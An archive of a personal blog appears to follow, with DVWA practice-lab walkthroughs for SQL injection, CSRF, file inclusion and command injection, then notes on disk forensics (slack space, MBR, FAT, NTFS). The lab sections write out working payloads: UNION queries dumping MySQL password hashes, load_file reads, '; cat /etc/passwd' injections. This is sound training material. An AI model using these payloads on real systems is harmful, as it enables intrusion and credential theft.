I'm Newbie !: 2012

Kamis, 19 Juli 2012

DVWA SQL Injection LOW Level

1. Input 1 for the user id and hit submit to see the result.

When you hit submit the code SELECT first_name, last_name FROM users WHERE user_id = '1'; is sent to the database, and the database returns with the first_name of admin and last_name of admin and then displays this information to you.

2. Lets check and see how the form handler quotes by entering O'brien and hitting submit.

Now this return's an error, but it's still interesting because it looks like the form accepted the O' and didn't know what to do with the brien part. This means we can use the single quote in the form without problems.

3. Lets try a statement that is always true by entering O' or 1=1;-- and hitting submit.

Again we get an error, it appears not to like the -- part of our statement, the hope for using this is to comment out the rest of the query. The extra single quote at the end of the error shows us that it is expecting the single quote from user_id = ' to be closed, so lets keep trying.

4. Lets try another statement that is always true, but with some quotes in there to fix the error in the last step. Enter O' or ''=' and hit submit.

The same results can be found with 1' or '1'='1';# and hitting submit or anything else that looks similar and works out as always true.

We just got a list of all of the names of users in the database. We submitted the query SELECT first_name, last_name FROM users WHERE user_id = '1' or '1=1';#'; which says "Give me all of the first and last names of people who's user_id is equal to 1 or 1 is equal to 1 (which is always true and therefore it returns every entry). Also, the addition of the # symbol comments out the rest of the line (the goal of the -- that didn't work) so we can use that to make some more interesting queries and get some additional information.

5. Let's try and find out how many columns are in the table with some more queries. To try one column we can enter 1' ORDER BY 1;# and see what happens.

No errors return, this means there is at least 1 column in the table.
To try two columns we can enter 1' ORDER BY 2;# and see what happens.

Again no errors return, this means there is at least 2 columns in the table.
To try three columns we can enter 1' ORDER BY 3;# and see what happens.

Hurray and error! This means there is not 3 columns in the table, but only two.

6. Now let's try and find out the field names in the table. Lets start with 1' or firstname IS NULL;# and see what happens.

We get an error that tells us there is no field named firstname. Lets try again with 1' or first_name IS NULL;# and see what happens.

7. Let's try to find the table name, input O' OR users.user_id IS NOT NULL;# and submit it. This will return all of the results in the table users where the field user_id is not empty.

This is great! (and luck) we now know that the table name is users.

8. Let's try and find the database name, first we will figure out how long the database name is by using the _ character which represents 1 character. Input O' OR database() LIKE '__';# into the field and see what happens.

This returns no results, because the database name is not 2 characters long, let's try 3 with O' OR database() LIKE '___';# and pressing submit.

Still no results, so let's try 4 characters by inputting O' OR database() LIKE '____';# and submitting it.

Alright, we now know the database name is 4 characters long, let's try and figure out what they are. To save space I'm just going to do a few of the letters that are in the database name. Let's start by inputting O' OR database() LIKE '%W%';# and hitting submit.

Alright, so the query checks to see if the letter W is anywhere in the database name and we get the results returned because it is. Let's find the other letters, try O' OR database() LIKE '%V%';# and hit submit.

Alright, so it contains a V, two letters left lets do O' OR database() LIKE '%D%';# and hit submit.

And for the final letter we can do O' OR database() LIKE '%A%';# and hit submit.

Alright, so we have the letters W, V, D, and A. We unscramble them and we get DVWA of course, but to confirm we can do O' OR database() LIKE 'DVWA';# and get our results.

9. Lets find out what other tables are in this database, and thanks to the SQL-92 Standardization (ISO 9075) this is actually quite easy. SQL-92 Standardization requires the information_schema table which means we can input O' UNION SELECT table_schema, table_name FROM information_schema.tables;# and hit submit to find all of the tables in the database.

Well, that's a rather long list but still very useful. Let's gather some more information.

10. Lets get the current SQL database version by issuing the command O' UNION ALL SELECT 1, @@version;# and hitting submit.

11. How about the current database user? Let's do O' UNION ALL SELECT system_user(), user();# and hit submit.

12. Lets try and get some password hashes to be cracked later, but to do this we will need to return information not normally asked for so we will have to be a little creative with our SQL code. Enter O' UNION ALL SELECT user, password FROM mysql.user;#' and see what you get.

So this query asks for ALL username and passwords from the mysql.user table.

13. We can also load up php files as well, lets try this ' UNION ALL SELECT Load_file('/srv/dvwa-nologin/config/config.inc.php'), '1 and hit submit.

Until here only,hereinafter I have not tried.
thank's.
(good luck)

Rabu, 30 Mei 2012

DVWA CSRF (Cross Site Request Forgery) LOW Level

Cross Site Request Forgery is very dangerous, and also quite common. OWASP describes Cross Site Request Forgery as:

Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into loading a page that contains a malicious request. It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf, like change the victim's e-mail address, home address, or password, or purchase something. CSRF attacks generally target functions that cause a state change on the server but can also be used to access sensitive data.

1. Go to the CSRF page in DVWA and Change your admin password by entering a password in the New password and Confirm new password fields and clicking the Change button.

Notice that the page is loading, but not complete. That is because we need to tell Burp Suite to forward the packet and let it finish it's process.

2. Go to Burp Suite, click the Proxy tab, and view the password change http request and

forward it after and you will see that your Password Changed on the DVWA site.

Now the part we are interested in is the begenning of the http request which looks

something like:

http://localhost/dvwa/vulnerabilities/csrf/?

password_new=admin&password_conf=password&Change=Change#

Now all we have to do is construct a link that will perform the same function and hide it

in some html so our victim doesn't know it is happening.

just until here, if there which will continue please..

Minggu, 27 Mei 2012

DVWA-FILE INCLUSION : LOW Level

File Inclusion (FI) is a type of vulnerability most often found on websites. It allows an attacker to include a local file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity.

1.) Open Browser And go to the DVWA web browser page (http://localhost/dvwa/Login.php)

2.) Input Username : admin and Password : password Next Login

3.) Go to the DVWA Security page and change the Script Security setting from high to low.

4.) Go to the File Inclusion page of DVWA and we will get started.

5.) Click the View Source button to see what the File Inclusion Source looks like, this will give us an idea of how this works and what we can do.

Now we can see that there is no filtering of what we include, so lets try some things out.

6.) Change the URL from http://localhost/dvwa/vulnerabilities/fi/?page=include.php to http://localhost/dvwa/vulnerabilities/fi/?page=/etc/passwd and see what happens.

As you can see, we get the contents of the passwd file and a few error messages. We now know the name of every user who can log into the local system, but what about all of the groups that exist?

7.) Again change the URL to http://localhost/dvaw/vulnerabilities/fi/?page=/etc/group and see what happens.

Again, we get the contents of the group file and some error messages. We could view the contents of any file the web server has read access. If this were a truly insecure website, we could also use this to view pages on other websites by changing the URL like we did before but instead pointing to a remote file or webpage.

DVWA COMMAND EXECUTION : LOW Level

1.) Open Browser And go to the DVWA web browser page (http://localhost/dvwa/Login.php)

2.) Input Username : admin and Password : password Next Login

3.) Go to the DVWA Security page and change the Script Security setting
from high to low.

4.) Go to the Command Execution page in DVWA and try it out to see what it does.

Based on the response we get, we can figure out that when we enter an IP address and press submit, the server executes the command ping -c 3 192.168.1.1 and tells us the result. Now lets experiment and see what else we can get out of the server.

5.) Next we try the command 192.168.1.1 ; ls and see what happens.

Great! First we get back the same ping results, but we also get the results from the ls command which tells us that there are two folders, help and source, and one file, index.php, in the directory where the commands are being executed.

6.) Lets find out where these commands are running at, and where the filed we found previously are located by issuing the command ; pwd and reviewing the results.

Now we can see that the commands are being executed in the /srv/dvwa-nologin/vulnerabilities/exec directory, and this is also where our files are located.

7.) Lets find out who we are executing the commands as and what processes are running on the machine by executing ; whoami ; ps and viewing the results.

Now we can see that we are executing commands as the www-data user and all of the processes running on the machine.

8.) Lets see if we can find out who is allowed to login to this machine with the ; cat /etc/passwd command (this could later be used to bruteforce passwords and gain superuser access).

The /etc/passwd file is a text-based database of information about users that may login to the system or other operating system user identities that own running processes.

If you go to the links listed under More info you can try out some more commands. This is just a sample of the many things that could be done.

Now lets check the source code of the vulnerable file:

High Command Execution Source
<?php

if( isset( $_POST[ 'submit' ] ) ) {

$target = $_REQUEST["ip"];

$target = stripslashes( $target );

// Split the IP into 4 octects
$octet = explode(".", $target);

// Check IF each octet is an integer
if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])) && (sizeof($octet) == 4) ) {

// If all 4 octets are int's put the IP back together.
$target = $octet[0].'.'.$octet[1].'.'.$octet[2].'.'.$octet[3];

// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {

$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';

} else {

$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';

}

}

else {
echo '<pre>ERROR: You have entered an invalid IP</pre>';
}

}

?>

Medium Command Execution Source
<?php

if( isset( $_POST[ 'submit'] ) ) {

$target = $_REQUEST[ 'ip' ];

// Remove any of the charactars in the array (blacklist).
$substitutions = array(
'&&' => '',
';' => '',
);

$target = str_replace( array_keys( $substitutions ), $substitutions, $target );

// Determine OS and execute the ping command.

Low Command Execution Source
<?php

if( isset( $_POST[ 'submit' ] ) ) {

$target = $_REQUEST[ 'ip' ];

// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {

$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';

} else {

$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';

}

}
?>

Minggu, 18 Maret 2012

Magic Number

1. In source code, some non-obvious constant whose value is significant to the operation of a program and that is inserted inconspicuously in-line (hardcoded), rather than expanded in by a symbol set by a commented #define. Magic numbers in this sense are bad style.

2. A number that encodes critical information used in an algorithm in some opaque way. The classic examples of these are the numbers used in hash or CRC functions, or the coefficients in a linear congruential generator for pseudo-random numbers. This sense actually predates and was ancestral to the more common sense

3. Special data located at the beginning of a binary data file to indicate its type to a utility. Under Unix, the system and various applications programs (especially the linker) distinguish between types of executable file by looking for a magic number. Once upon a time, these magic numbers were PDP-11 branch instructions that skipped over header data to the start of executable code; 0407, for example, was octal for ‘branch 16 bytes relative’. Many other kinds of files now have magic numbers somewhere; some magic numbers are, in fact, strings, like the !<arch> at the beginning of a Unix archive file or the %! leading PostScript files. Nowadays only a wizard knows the spells to create magic numbers. How do you choose a fresh magic number of your own? Simple — you pick one at random. See? It's magic!

4. An input that leads to a computational boundary condition, where algorithm behavior becomes discontinuous. Numeric overflows (particularly with signed data types) and run-time errors (divide by zero, stack overflows) are indications of magic numbers. The Y2K scare was probably the most notorious magic number non-incident.

The magic number, on the other hand, is 72. See The magical number seven, plus or minus two: some limits on our capacity for processing information by George Miller, in the Psychological Review 63:81-97 (1956). This classic paper established the number of distinct items (such as numeric digits) that humans can hold in short-term memory. Among other things, this strongly influenced the interface design of the phone system.

Unallocated space

Unallocated space, sometimes called “free space”, is logical space on a hard drive that the operating system, e.g Windows, can write to. To put it another way it is the opposite of “allocated” space, which is where the operating system has already written files to.

Examples.

If the operating system writes a file to a certain space on the hard drive that part of the drive is now “allocated”, as the file is using it the space, and no other files can be written to that section. If that file is deleted then that part of the hard drive is no longer required to be “allocated” it becomes unallocated. This means that new files can now be re-written to that location.

On a standard, working computer, files can only be written to the unallocated space.

If a newly formatted drive is connected to a computer, virtually all of the drive space is unallocated space (a small amount of space will be taken up by files within the file system, e.g $MFT, etc). On a new drive the unallocated space is normally zeros, as files are written to the hard drive the zeros are over written with the file data

Working Example

Blank Drive

A freshly formatted (NTFS) 500 GB hard drive starts with 99.9% unallocated space; we will assume its 100% to make the maths slightly easier. All of the unallocated space will be zeros, literally 00 00 00 written on the hard drives.

If a 5 GB file, e.g a large movie, is placed on the drive, then there will be 1% (5 GB) allocated space and 99% unallocated (495 GB)

If a 10 GB database file is now added to this hard drive there will be a total of 3 % (15 GB) of allocated space and 485 GB unallocated space. New files will only be written into the remaining unallocated space.

What happens when a file is deleted

If the movie file, from the above example, is deleted the allocated space it was using will now become unallocated. I.e There will now be 2% allocated space (the 10 GB database) and 98% unallocated space.

However the data from the movie file is still on the hard drive, it does not just disappear, it just changes its status. This means that the following situation now exists:

There is 10 GB of allocated space and 490 GB of unallocated space.

Of the 490 GB, 485 GB would be all zeros, however 5 GB of the unallocated space would be the old movie data.

Until new files are written to the hard drive this movie file will remain deleted but still recoverable from the hard drive. Even if new files are written it must overwrite the same unallocated space as the movie file, before the movie file is destroyed.

slack space

slack space is The unused space in a disk cluster. The DOS and Windows file systems use fixed-size clusters. Even if the actual data being stored requires less storage than the cluster size, an entire cluster is reserved for the file. The unused space is called the slack space.

DOS and older Windows systems use a 16-bit file allocation table (FAT), which results in very large cluster sizes for large partitions. For example, if the partition size is 2 GB, each cluster will be 32 K. Even if a file requires only 4 K, the entire 32 K will be allocated, resulting in 28 K of slack space. Windows 95 OSR 2 and Windows 98 resolve this problem by using a 32-bit FAT (FAT32) that supports cluster sizes smaller than 1K.

The ISO 9660 File System

This article describes the ISO 9660 file system format used on compact disc read only memory (CD-ROM). CD-ROMs have become so popular (and cheap) that its market share grew exponential over the last years. Therefore, it is worthwhile to examine the file system used on CD-ROMs. What makes it different to other file systems such as the UNIX File System (UFS) used on e.g. SunOS systems?

Introduction

The audio compact disks are only one decade old, but surprisingly enough it pushed the vinyl records completely from the market. It was in the beginning of the 1980s that Philips and Sony introduced the Compact Disc Digital Audio (CD-DA) Standard, better known as the Red Book standard.

It was also Philips and Sony who introduced in 1984 the CD-ROM (Compact Disc Read Only Memory) standard, which is commonly known as the Yellow Book standard.

The computer industry immediately saw the benefits of CD-ROMs, namely:

· cheaper in production than tapes

· cheaper in shipping to customers

· less vulnerable to dust, fingerprints, magnetic fields than tapes

· large capacity, more than 600 Mbytes

· cannot be overwritten by accident, because it is a read-only medium

Therefore, it did not take long before the CD-ROM became quiet popular among developers and customers.

However, to make a CD-ROM was until last year problematic because for mastering a CD-ROM special equipment was needed. These so called CD-writers have become affordable now, so that making a CD-ROM master (which can also be read with normal CD drives) is no big deal anymore. Making duplicates (the silver CD-ROMs) from a master (the golden CD-ROM) costs about 60 BEF a piece, which is a fair price!

The only problem was that CD-ROMs were not interchangeable amongst different computer architectures. The ISO 9660 standard was created to define the external characteristics of data on a CD-ROM to make it architecture independent. The first standard did not quite go far enough, so an ad hoc committee of hardware and software suppliers met at the High Sierra Hotel in Nevada (USA) and drew up a proposal for the ?High Sierra? format for CD-ROM file structure. The previous ISO 9660 standard and the High Sierra file structure were combined into a complete ISO 9660 standard (1988).

There are almost 6 million CD readers sold until now, which proves that CD-ROMs are a very popular medium among the commercial and non-commercial end-users.

Colour books of standards

The Compact Disc Digital Audio (CD-DA) standard (or just CD) made by Philips and Sony in the early 1980s became the de facto standard for all audio discs, and means that any CD plays on any audio CD drive. This standard became known as the Red Book. The Red Book specifies that the audio data is on the CD in one or more tracks. Each track is normally one song. These tracks are further subdivided into sectors that are 1/75 of a second in length and contain 2352 bytes of audio data in digital form. A maximum of 99 audio tracks may be placed on a standard Red Book disc.

In addition to the 2352 bytes of audio data, the Red Book specifies the addition of 2 layers of error detection and error correction code (EDC/ECC). The compact disc utilises the Cross Interleave Reed-Solomon Code (CIRC) in its first two layers of error protection. If a disc gets scratched or dirty and a laser cannot read the data, the CD player uses the CIRC to recreate the music.

Each sector is also assigned 98 control bytes, which control the timing information that the CD player uses to display the length of each song.

The Yellow Book standard was introduced by Philips and Sony in 1984 which defined the Compact Disc Read Only Memory (CD-ROM) layout.

The Yellow Book further defined the Red Book by adding two new types of tracks.

The track type defined in the Red Book is:

· CD-Audio, for audio music.

The two new track types defined in the Yellow Book are:

· CD-ROM Mode 1, usually used for computer data.

· CD-ROM Mode 2, usually used for compressed audio data, and video/picture data. Also, usually further defined as XA (eXtended Architecture).

The CD-ROM Mode 1 and Mode 2 tracks use the Red Book specifications as a foundation. The difference between the Red Book and the Yellow Book is a redefinition of the 2352 byte Red Book data area.

Furthermore, the Yellow Book CD-ROM Mode 1 and Mode 2 use the same track layout as the Red Book specification, including the error correction and control bytes. The fundamental difference between the two Yellow Book CD-ROM modes is the way in which they use the main data segment.

The Yellow Book CD-ROM Mode 1 defines the ISO 9960 and non-ISO 9660 standards. The ISO 9660 compliant CD-ROMs are readable by any kind of (modern) operating systems, such as DOS, UNIX, MacOS, AmigaDOS and other OSes.

The CD-ROM Mode 1 divides the 2352 byte data area defined by the Red Book standards into the following:

· 12 bytes of synchronisation

· 4 bytes of header information

· 2048 bytes of user information

· 288 bytes of error correction and detection codes.

The first 16 bytes contain the synchronisation and header information that the computer uses to determine which sector it is reading. The following 2048 bytes contain the actual user data. Together, these two subdivisions comprise the full 2352 byte portion of the Red Book standard.

The last 288 bytes carry an additional layer of error correction and direction code. This additional layer, which is found only in Mode 1, provides the reliability that is needed for certain types of computer data.

CD-ROM Mode 2 redefines the use of the 2352 byte data area as follows:

· 12 bytes of synchronisation

· 4 bytes of header information

· 2336 bytes of user data.

The main advantage of Mode 2 is that it provides an additional 14 per cent of the user data space per sector (2336 versus 2048 bytes). The reason is that Mode 2 does not have the additional EDC and ECC error correction data of Mode 1.

Mode 2 discs are normally used in extended architecture (XA) format. Even without XA, there are still two layers of error correction as defined in the Red Book standard. CD-ROM Mode 2 discs can be read by a standard CD-ROM drive, but require special software to decode and strip the user data from each sector.

CD-ROM Mode 2 allows compressed audio data and video/picture data to be incorporated on the disc, thanks to the alignment of the byte layout. The drawback is that a CD-ROM drive reading this data cannot read computer data while it?s playing audio.

The next step in CD technology was to create a file format that lent itself to the incorporation of audio and video/picture data. To define this extension to the Yellow Book standard, Sony and Philips produced the Compact Disc Read Only Memory Extended Architecture (CD-ROM/XA). The XA disc has compressed audioand computer data interleaved on the same track, so it can read the computer data and play audio on the same time.

This was a dramatic improvement on existing Yellow Book technology, and marks the point from which application discs that made best use of CD-ROM technology started to develop. CD-ROM/XA Mode 2 is subdivided into Form 1 (for computer data) and Form 2 (for compressed audio data and video/picture data).

The Compact Disc Interactive (CD-I) Media standard was released in 1987 by Philips. This standard specifies the CD-I disc layout and an operating system called CD-RTOS. This specification is known as the Green Book standard. Like CD-ROM/XA, this standard allows for the interleaving of computer data and compressed audio on the same track. The CD-I track is not shown in the table of contents on the disc. This prevents audio players from playing the CD-I track. The sector layout of a CD-I disc is identical to CD-ROM/XA. A CD-I system consists of a stand-alone CD-I player connected to a TV set.

Remember, the main drawback of a CD-ROM is, at least for some people, that it is a read-only medium (the ROM part of it?s name)! Writable mediums were needed to fulfil new (created) needs. In Frankfurt (Germany) a group was formed (guess the name) - the Frankfurt Group - which includes Philips, Sony, Kodak and others to take CD-ROM into the writable market. This became the Orange Book standard defining a CD that lets users write audio and/or data to disc. Part 1 of the Orange Book describes a Compact Disc-Magneto Optical (CD-MO) where data can be written, erased and rewritten. Part 2 describes a Compact Disc Write Once (CD-WO) where data can be written but not erased. The CD-WO is better known under it?s name CD-R where R stands for recordable. CD writers are becoming quite popular these days (and affordable).

The ISO 9660 File System

An ISO 9660 CD-ROM is described in Figure 1.

A reserved field at the beginning of the disk is present for use in booting CD-ROM on a computer (system area). As a matter of fact its use was not specified by the ISO 9660 standard, but generally it is used for boot information.

Immediately afterwards, a series of volume descriptors details the contents and kind of information contained on the disk (something like the partition table of MS-DOS).

A volume descriptor describes the characteristics of the file system information present on a given CD-ROM, or volume. It is divided into two parts;

· the type of volume descriptor, and

· the characteristics of the descriptor.

The volume descriptor is constructed in this matter so that if a program reading the disk does not understand a particular descriptor, it can just skip over it until it finds one it recognises, thus allowing the use of many different types of information on one CD-ROM. Also, if an error were to render a descriptor unreadable, a subsequent redundant copy of a descriptor could then allow for fault recovery. When checking CD-ROMs with a dump utility we find each descriptor back in a single logical sector on itself, and also a backup of the descriptor a few logical sectors further.

The minimum requirement is that it has a primary descriptor describing the ISO 9660 file system and an ending descriptor (a variable length table that contains information on how many other descriptors are present).

Kamis, 15 Maret 2012

Master Boot Record (MBR)

In the IBM PC architecture the Master Boot Record (MBR), or partition sector, is the 512-byte (½ kilobyte) boot sector, i.e. the sector on the physical beginning of a hard disk that contains the sequence of commands necessary for booting the operating system(s) (OSes).

The bootstrapping firmware contained within the ROM BIOS loads and executes the master boot record. The MBR of a drive usually includes the drive's partition table, which the PC uses to load and run the boot record of the partition that is marked with the active flag. This design allows the BIOS to load any OS without knowing exactly where to start inside its partition. Because the MBR is read almost immediately when the computer is started, many computer viruses made in the era before virus scanner software became widespread operated by changing the code within the MBR.

The Partition Table:

In computer engineering, hard disk drive partitioning is the creation of logical divisions on a hard disk that allows one to apply operating system-specific logical formatting.

The partition table is located in the master boot record on the disk. The master boot record is the first sector on a disk. The partition table consists of 64 bytes. There are 4 partition table entries. Each is 16 bytes in length.

The partition table starts at offset (Hexadecimal) 0x1BE. Each partition table entry is 16 bytes in length so:

Master Boot Record / Extended Partition Boot Record

(offset)

0x0000 to 0x01BD - First 446 bytes (boot loader code)

0x01BE to 0x01CD - Partition entry 1

0x01CE to 0x01DD - Partition entry 2

0x01DE to 0x01ED - Partition entry 3

0x01EE to 0x01FD - Partition entry 4

0x01FE to 0x01FF - Boot signature (55 AA)

Each partition table entry has the following arrangement:

|====================================================|

| Byte Count | Description of contents |

|====================================================|

| 1 | Boot indicator (0x00 off, 0x80 on) |

|====================================================|

| 3 | Starting head, cylinder and sector |

|====================================================|

| 1 | File system descriptor |

|====================================================|

| 3 | Ending head, cylinder and sector |

|====================================================|

| 4 | Starting sector (offset to disk start |

|====================================================|

| 4 | Number of sectors in partition |

|====================================================|

Sample partition table entry... (please also keep in mind that all bytes are in little endian):

offset: value explanation

======: ===== ===========

0x01BE: 0x80 bootable flag (0x00 for flag off, 0x80 for on)

0x01BF: 0x00 0x02 0x00 starting head, cylinder and sector

0x01C2: 0x07 file system descriptor

0x01C3: 0x1A 0x5B 0x8C ending head, cylinder and sector

0x01C6: 0x02 0x00 0x00 0x00 starting sector (relative to start of disk)

0x01CA: 0x00 0x35 0x0C 0x00 number of sectors in partition

Active partition: The Bootable Flag determines the active partition. Only one partition can normally be active at a time. The active marker is used during boot: after the BIOS loads the MBR into memory and executes it, the MBR checks the partition table at its end, and locates the active partition. Then it proceeds to load the boot sector of that partition into memory and runs it.

Logical partitions: Logical partitions are a way to extend the Master Boot Record's limitation of four partitions. One partition can be designated as an extended partition. This can contain up to 24 logical partitions, whose details are listed in the extended partition's own partition table, the Extended Partition Boot Record or EPBR. Modern operating systems treat these the same as primary partitions.

FAT 16

Introduction

This is the 16-bit version of the FAT file system. The 16-bit part describes the way units are allocated on the drive. The FAT16 file system uses a 16-bit number to identify each allocation unit (called cluster), and this gives it a total of 65.536 clusters. The size of each cluster is defined in the boot sector of the volume (volume = partition). The File System ID number usually associated with FAT16 volumes are 04h and 06h. The first is used on volumes with less than 65536 sectors (typical this is on drives less than 32 Mb in size), and the latter one is used on volumes with more than 65536 sectors. There is also another variant which is used with the LBA address mode, that variant has a File System ID of 0Eh.

Basic Structure

The FAT16 file system structure contains the following regions:

FAT16 File System Structure

Region
Reserved Region (incl. Boot Sector)
File Allocation Table (FAT)
Root Directory
Data Region

The first sector (boot sector) contain information which is used to calculate the sizes and locations of the other regions. The boot sector also contain code to boot the operating system installed on the volume. The data region is split up into logical blocks called clusters. Each of these clusters has an accompanying entry in the FAT region. The cluster specific entry can either contain a value of the next cluster which contain data from the file, or a so called End-of-file value which means that there are no more clusters which contain data from the file. The root directory and its sub-directories contain filename, dates, attribute flags and starting cluster information about the filesystem objects.

Boot Sector

The first sector in the reserved region is the boot sector. Though this sector is typical 512 bytes in can be longer depending on the media. The boot sector typical start with a 3 byte jump instruction to where the bootstrap code is stored, followed by an 8 byte long string set by the creating operating system. This is followed by the BIOS Parameter Block, and then by an Extended BIOS Parameter Block. Finally the boot sector contain boot code and a signature.

Structure of the FAT16 Boot sector

Part	Offset	Size	Description
Code	0000h	3 bytes	Code to jump to the bootstrap code.
OS Name	0003h	8 bytes	Oem ID - Name of the formatting OS
BIOS Para- meter Block	000Bh	2 bytes	Bytes per Sector
	000Dh	1 bytes	Sectors per Cluster - Usual there is 512 bytes per sector.
	000Eh	2 bytes	Reserved sectors from the start of the volume.
	0010h	1 bytes	Number of FAT copies - Usual 2 copies are used to prevent data loss.
	0011h	2 bytes	Number of possible root entries - 512 entries are recommended.
	0013h	2 bytes	Small number of sectors - Used when volume size is less than 32 Mb.
	0015h	1 bytes	Media Descriptor
	0016h	2 bytes	Sectors per FAT
	0018h	2 bytes	Sectors per Track
	001Ah	2 bytes	Number of Heads
	001Ch	4 bytes	Hidden Sectors
	0020h	4 bytes	Large number of sectors - Used when volume size is greater than 32 Mb.
Ext. BIOS Para- meter Block	0024h	1 bytes	Drive Number - Used by some bootstrap code, fx. MS-DOS.
	0025h	1 bytes	Reserved - Is used by Windows NT to decide if it shall check disk integrity.
	0026h	1 bytes	Extended Boot Signature - Indicates that the next three fields are available.
	0027h	4 bytes	Volume Serial Number
	002Bh	11 bytes	Volume Label - Should be the same as in the root directory.
	0036h	8 bytes	File System Type - The string should be 'FAT16 '
Code	003Eh	448 bytes	Bootstrap code - May schrink in the future.
Sig.	01FEh	2	Boot sector signature - This is the AA55h signature.

FAT 32

Introduction

This is the 32-bit version of the FAT file system. The 32-bit part describes the way units are allocated on the drive. The FAT32 file system uses a 32-bit number to identify each allocation unit (called cluster), and this gives it a total of 4.294.967.296 clusters. The size of each cluster is defined in the boot sector of the volume (volume = partition).

Boot Sector Structure

The first sector on the volume is the boot sector. It is exactly 512 bytes long and have the following structure.

Structure of the FAT32 Boot sector

Part	Offset	Size	Description
Code	0000h	3 bytes	JMP 0x80h
OS Name	0003h	8 bytes	Oem ID - Name of the formatting OS
BIOS Para- meter Block	000Bh	2 bytes	Bytes per Sector on the physical medium - Normally 512 bytes
	000Dh	1 bytes	Sectors per Cluster - 1, 2, 4, 8, 16, 32, 64 or 128 sectors
	000Eh	2 bytes	Reserved sectors in front of the FAT(s) incl. the Boot sector
	0010h	1 bytes	Number of FAT copies - Normaly 2
	0011h	4 bytes	Not used in FAT32
	0015h	1 bytes	Media Descriptor - The same as in FAT16, but FAT32 is only allowed on harddrives, so the value is F8h
	0016h	2 bytes	Not used in FAT32
	0018h	2 bytes	Sectors per Track - The disc geometry used when formatting the partition.
	001Ah	2 bytes	Heads - The disc geometry used when formatting the partition.
	001Ch	4 bytes	The number of sectors on the disk from the start of the partition to the beginning of the first FAT.
	0020h	4 bytes	Number of sectors in the partition
	0024h	4 bytes	Sectors per FAT
	0028h	2 bytes	FAT handling flags
	002Ah	2 bytes	FAT32 Drive Version (High byte = Major version, Low byte = Minor version)
	002Ch	4 bytes	Cluster number for the start of the Root Directory Table
	0030h	2 bytes	Sector number from the start of the partition, for the File System Information Sector
	0032h	2 bytes	Sector number from the start of the partition, for the Backup Boot Sector
	0034h	12 bytes	Reserved
Ext. BIOS Para- meter Block	0040h	1 bytes	Logical Drive Number - Normaly 00h for floppies and 80h for hard drives.
	0041h	1 bytes	Current Head
	0042h	1 bytes	Signature
	0043h	4 bytes	ID - Random generated serial number
	0047h	11 bytes	Volume Label - The same as stored in a special file in the root directory.
	0052h	8 bytes	System ID - This is the string 'FAT32 '
Code	005Ah	420 bytes	Free - Used for executable code - May shrink in the future.
Sig.	01FEh	2	Executable sector signature (AA55h when read into a register)

New Technology File System (NTFS)

NTFS also includes security features required for file servers and high-end personal computers in a corporate environment, and data access control and ownership privileges important for data integrity.

Multiple Data Streams

NTFS supports multiple data streams, where the stream name identifies a new data attribute on the file. A handle can be opened to each data stream. A data stream, then, is a unique set of file attributes. Streams have separate opportunistic locks, file locks, and sizes, but common permissions.

This feature enables you to manage data as a single unit. The following is an example of an alternate stream:

myfile.dat:stream2

A library of files might exist where the files are defined as alternate streams, as in the following example:

library:file1

:file2

:file3

A file can be associated with more than one application at a time, such as Microsoft® Word and Microsoft® WordPad. For instance, a file structure like the following illustrates file association, but not multiple files:

program:source_file

:doc_file

:object_file

:executable_file

You can use the Win32 advanced programming interface (API) CreateFile to create an alternate data stream. Or, at the command prompt, you can type commands such as:

echo text>program:source_file

more <program:source_file

Caution

Because NTFS is not supported on floppy disks, when you copy an NTFS file to a floppy disk, data streams and other attributes not supported by FAT are lost without warning.

Reparse Points

Reparse points are new file system objects in the version of NTFS included with Windows 2000. Reparse points have a definable attribute containing user-controlled data and are used to extend functionality in the input/output (I/O) subsystem.

Change Journal

The change journal is used by NTFS to provide a persistent log of all changes made to files on the volume. For each volume, NTFS uses the change journal to track information about added, deleted, and modified files. The change journal is much more efficient than time stamps or file notifications for determining changes in a given namespace.

The change journal is implemented as a sparse stream in which only a small active range uses any disk allocation. The active range initially begins at offset 0 in the stream and moves monotonically forward. The unique sequence number (USN) of a particular record represents its virtual offset in the stream. As the active range moves forward through the stream, earlier records are deallocated and become unavailable. The size of the active range in a sparse file can be adjusted.

Encryption

File and directory-level encryption is implemented in the version of NTFS included with Windows 2000 for enhanced security in NTFS volumes. Windows 2000 uses Encrypting File System (EFS) to store data in encrypted form, which provides security when the storage media are removed from a system running Windows 2000.

Sparse File Support

Sparse files allow programs to create very large files, but to consume disk space only as needed. A sparse file is a file with an attribute that causes the I/O subsystem to allocate the file's meaningful (nonzero) data. All nonzero data is allocated on disk, whereas all nonmeaningful data (large strings of data composed of zeros) is not. When a sparse file is read, allocated data is returned as it was stored, and nonallocated data is returned, by default, as zeros in accordance with the C2 security requirement specification.

NTFS includes full sparse file support for both compressed and uncompressed files. NTFS handles read operations on sparse files by returning allocated data and sparse data. It is possible to read a sparse file as allocated data and a range of data without having to retrieve the entire data set, although, by default, NTFS returns the entire data set.

You can set a user-controlled file system attribute to take advantage of the sparse file function in NTFS. With the sparse file attribute set, the file system can deallocate data from anywhere in the file and, when an application calls, yield the zero data by range instead of storing and returning the actual data. File system APIs allow for the file to be copied or backed as actual bits and sparse stream ranges. The net result is efficient file system storage and access. Figure shows how data is stored with and without the sparse file attribute set.

Structure of an NTFS Volume

Like FAT, NTFS uses clusters as the fundamental unit of disk allocation. In the Disk Management snap-in, you can specify a cluster size of up to 4 KB. If you type format at the command prompt to format your NTFS volume, but do not specify an allocation unit size using the /A:<size> switch , the values in Table will be used.

Table Default Cluster Sizes for NTFS

*Volume Size*	*Sectors Per Custer*	*Default Cluster Size*
512 MB or less	1	512 bytes
513 MB–1,024 MB (1 GB)	2	1,024 bytes (1 KB)
1,025 MB–2,048 MB (2 GB)	4	2,048 bytes (2 KB)
Greater than 2,049 MB	8	4 KB

Note

